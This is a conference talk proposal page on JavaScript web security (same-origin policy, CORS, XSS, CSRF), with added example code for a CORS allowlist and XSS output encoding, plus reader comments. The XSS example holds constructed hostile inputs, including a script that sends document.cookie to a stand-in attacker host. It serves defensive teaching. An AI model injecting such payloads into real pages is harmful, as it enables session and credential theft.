by Raghu Mitra (@raghumitra) on Thursday, 18 July 2013

+24
Status: Submitted
Section
Full talk

Technical level
Intermediate

Objective

Learn about the common web security vulnerabilities and browser security policies, and how to work with them in JavaScript.

Description

Almost everybody who has written some serious JavaScript code has run into security-related problems.
Browsers enforce security policies on JavaScript, such as the same-origin policy and Content Security Policy (CSP), which sometimes get in the way of legitimate functionality.
In this session we will discuss how to relax them in a controlled way (for example with CORS), should there be any need.
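The usual way to relax the same-origin policy for a cross-origin caller is CORS, and the security-relevant part is the server's decision about which `Origin` values to trust. The following is an added example, not code from the talk or from any Citrix product: a small server-side CORS decision in Node.js with a hypothetical allowlist (`app.example.com`, `admin.example.com`) and hypothetical helper names. It echoes only an allowlisted origin, never `*` when credentials are involved, and refuses preflights from anyone else so the browser keeps blocking.

```javascript
// Added example: server-side CORS allowlist (hypothetical names and origins).
// Relaxes the same-origin policy only for origins we explicitly trust.

const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',   // assumed first-party front end
  'https://admin.example.com', // assumed internal console
]);

// Decide which CORS headers (if any) to add to a response.
// Returns null when the Origin is not allowed, so the browser keeps blocking.
function corsHeadersFor(originHeader, { allowCredentials = true } = {}) {
  if (typeof originHeader !== 'string') return null;  // same-origin or non-browser request
  if (originHeader === 'null') return null;           // sandboxed iframe or file:// page: never trust
  let origin;
  try {
    origin = new URL(originHeader).origin;            // normalises case, drops any path
  } catch {
    return null;                                      // malformed Origin header
  }
  if (!ALLOWED_ORIGINS.has(origin)) return null;      // never reflect arbitrary origins

  const headers = {
    // Echo the specific allowed origin; '*' is not permitted together with credentials.
    'Access-Control-Allow-Origin': origin,
    // Caches must key on Origin, or one client's answer is served to another origin.
    'Vary': 'Origin',
    'Access-Control-Allow-Methods': 'GET, POST',
    'Access-Control-Allow-Headers': 'Content-Type, X-CSRF-Token',
    'Access-Control-Max-Age': '600',
  };
  if (allowCredentials) headers['Access-Control-Allow-Credentials'] = 'true';
  return headers;
}

// Minimal request handling for a request shaped like { method, headers }.
// Preflights from untrusted origins get 403; actual responses only carry
// CORS headers when the origin is allowlisted.
function handleCors(req) {
  const cors = corsHeadersFor(req.headers['origin']);
  if (req.method === 'OPTIONS') {
    return cors ? { status: 204, headers: cors } : { status: 403, headers: {} };
  }
  return { status: 200, headers: cors || {} };
}
```

The allowlist is the whole point: reflecting whatever `Origin` the browser sent, or answering `*` while also setting `Access-Control-Allow-Credentials: true`, hands any site on the web an authenticated channel to the API.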

Even with those policies in place, programmers still have to defend against vulnerabilities such as cross-site scripting (XSS) and cross-site request forgery (CSRF).
In this session we will discuss how to close these security loopholes.
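For XSS, the fix is output encoding appropriate to the context the untrusted value lands in. The block below is an added example, not code from the talk: it renders a comment record with hypothetical helpers (`escapeHtml`, `safeHref`, `renderComment`) in Node.js, shows the vulnerable concatenation as the "before", and uses a constructed hostile input that attacks the text, attribute and URL contexts at once. The base URL used to resolve relative links is an assumption.

```javascript
// Added example: context-aware output encoding against XSS (hypothetical helpers).

// Encode for HTML text and double-quoted attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// URL context: only http(s) links are allowed in href. javascript:, data:,
// vbscript: and anything unparseable collapse to a harmless '#'.
function safeHref(url) {
  try {
    // Assumed base for resolving relative links in this example.
    const u = new URL(String(url), 'https://example.com/');
    if (u.protocol !== 'http:' && u.protocol !== 'https:') return '#';
    return escapeHtml(u.href);   // still attribute-encode the normalised URL
  } catch {
    return '#';
  }
}

// Vulnerable 'before': untrusted fields concatenated straight into markup.
function renderCommentUnsafe(c) {
  return `<li><a href="${c.site}">${c.author}</a>: ${c.body}</li>`;
}

// Hardened: every untrusted field encoded for the context it lands in.
function renderComment(c) {
  return `<li><a href="${safeHref(c.site)}">${escapeHtml(c.author)}</a>: ${escapeHtml(c.body)}</li>`;
}

// Constructed sample input simulating a hostile user (not real data).
const HOSTILE = {
  author: 'mallory" onmouseover="alert(1)',                 // attribute breakout
  site: 'javascript:alert(document.cookie)',                 // dangerous URL scheme
  body: '<script>fetch("https://evil.example/?c=" + document.cookie)</script>', // script injection
};
```

Note that `escapeHtml` alone would not have saved the `href`: a URL is already well-formed attribute text, so the `javascript:` scheme has to be rejected by parsing the URL, not by entity-encoding it. When the page is rendered client-side, the same rule applies in DOM terms: assign untrusted strings with `textContent`, not `innerHTML`.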

Speaker bio

Raghu & Rahul
We are SSEs working for Citrix R&D India Ltd. We work on providing UI for a bunch of networking products. Developing UI for an enterprise networking product that can be public facing sometimes has given us exposure to various security threats, and so far we have been successful in mitigating them :).

We would like to share our knowledge and understand more about the common security issues faced by enterprise web applications.

Comments

  • 2
    Om Shankar (@omshiv) 4 years ago

    Agree. JS is so approachable that any Tom, Dick and Harry can write code. Secure coding is something really important today, given that JS is everywhere right now.

    • 1
      Raghu Mitra (@raghumitra) Proposer 3 years ago

      Yeah, I totally agree with you, Om Shankar. This is the first thing that a cool-dude kind of user does when he comes across an interesting web app.
      All of us have to accept that at least once we have attempted to hack into a website/intranet site using Firebug, and when we find that the attack fails we feel good about the developer :)

  • 2
    Akash Mahajan (@makash) 3 years ago

    How will JavaScript allow you to protect against CSRF?

    • 1
      Raghu Mitra (@raghumitra) Proposer 3 years ago

      Sorry for the delayed response...
      If you have client JS, this can be done by using a methodology called a nonce.
      There are multiple types of nonce checks that can be employed depending on the kind of application we are dealing with.
      Not to mention we need some support from the server side for this, but I am sure it should be simple enough for any kind of server.
      HTH

  • 1
    Raghu K Mittal (@raghukmittal) 3 years ago

    Looking forward to this talk

  • 0
    Raghu Mitra (@raghumitra) Proposer 4 years ago

    I hope this will be useful for the folks attending jsfoo
